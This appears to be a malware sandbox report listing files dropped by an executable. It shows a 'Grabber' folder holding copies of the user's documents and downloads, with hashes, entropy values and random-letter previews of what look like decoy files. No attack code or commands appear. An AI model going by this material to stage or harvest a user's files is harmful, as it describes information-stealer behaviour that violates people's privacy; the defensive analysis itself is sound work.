Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\IVHSHTCODI.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JDSOXXXWOA.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697659282858546
Encrypted:	false
SSDEEP:	24:PZQpY9CEILBiF4Pm3eR+sEnNgL6nCW2Y+uaPg9N/v6Q:xz9CEILGCCeR+sCaLKT2TuamVD
MD5:	36FF3A29DF5FCCA14A0FF7431E1C2E9B
SHA1:	C9688881A1A294728BA4A8B5FB2F38DA3267AC07
SHA-256:	DE686B6E22DC89FE172C29EA9221415221F214CD895763E255FCF5AAEE38E240
SHA-512:	0861C1F602EEC19A2F41C7F9C56352DB9497F628B3F2ECDDC7B98B5E24559D7012EF45D020786DF67FAC85F485CD2A25941EA894681A6B42D9A6ABFC4B9C95CB
Malicious:	false
Preview:	JDSOXXXWOAHUSVGOCZZUNHSINJUSJQGESAHVTHZWADMWVUHKNKEYECCVOPSPXQMMRTJEEDOFPBKWQBWEDEAWUPPRVCRNLZAVBLNCWBMIYVZJGZUPTHGFKCXKWLTQCZQPVRXBIAVKYLTFXPKNHVWYMOUBOZQSCFNHTCTVVDHABNRSEIRXPGUVHPJRXHDVQOUZEXTQARFRICYOSUBNKEVGHZNSQHPCONVPIVIZKOKBTGHMBCORJUHRCVHLLLCXNSHKGVDKTVXUYWRZZWPFJNOSQIOTEJVJWRKTCWXZJKSTIXEMRZVNIBTWRTYOGNKENDSOGEUFCZHZYBWICCKXGXWKGNSNLJGLSDGHUWALHDWVZRYHCQNPZEFTPXYOSUVIOMEZVNNCZURCXELWTINXUKBZTOMRGIVZNMMHUVBKLGFRKYWMYSEIOMJGQGNNWXSIPRRGCYJLZPQIGVVRGGIWSBFJWNMIHYBTTNYTHUBYODAVVOMBAPZKYFUHGDXYMJBKYURCWOJWNGJWFWIHOYYRBYQMJCLIOPHRDDBMRPUMPYCXXGTMYQECUGCCJYKESOBMCTEIFVVICNMXJDGTYESOWLJHWFEFKDEKUKKLKISTLOTKRYLMZDQERBBALFYUEZMKPDBKAGGQHIKIECDSAGIELZVVCNSIPWEXNQLIRNXWGBYHVMXQAPKLQOTFHYKEIQETFBRRPRYPISBRTYMGEIXTCRSLOVMLKWKAUALATKYYNFIRASLERFJZYJWJDEUVJNQIHTSIBZHXWHXSSQNFOSWYDTKNMLOFKDOECKGKVBAKPFZRKCBMCDGLAABGWBCFMKGJUBIHBWBARNAHHTZKNZZPZAUEJJQIUMHCASBJGILUQKBBCSIQMEOUZCFGTXLDYKUHXCHFZHMBCWHRIOVRKXVQUVLMUKYQZQFGGFYGKWBAJJKGZINILPXFMXXMEKMODDVNAMUZNNTJCUURPRTMODGGFBSVRAIMVMRSDSSUQTQRZMVO

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TTCBKWZYOC.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695977454005895
Encrypted:	false
SSDEEP:	24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
MD5:	E0510B4427516C1D89AAD3659D680C3D
SHA1:	1992D34F6239D80EB43BA39F3222BF0785E5D1F4
SHA-256:	556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
SHA-512:	35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
Malicious:	false
Preview:	TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UQMPCTZARJ.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695507083990718
Encrypted:	false
SSDEEP:	24:QjvupLA8Rg2zRRjgGt3NjEIPTPpg8xIC5XVTaq8T77pQTI0++41E:QgLA0zR5gGt9jEGTR5zXuCTP7
MD5:	6D88D4A4BC7E23FFF4A04EC2CE2B4DB0
SHA1:	C37511CE25F91B44C9E676521E4292FFDAC7147E
SHA-256:	83DC936A36BAA847BD6781CAC0E35006D015860E605B4C26D237E98D13F1908A
SHA-512:	69D76EE3CD91D6B4017312EFD7AA7E084D77D12A8D755CED06EC5C63E6F65262C70199D59151518E34BD6FF8547814724A9BBC63E34742E63F1887BC2BBB2BC4
Malicious:	false
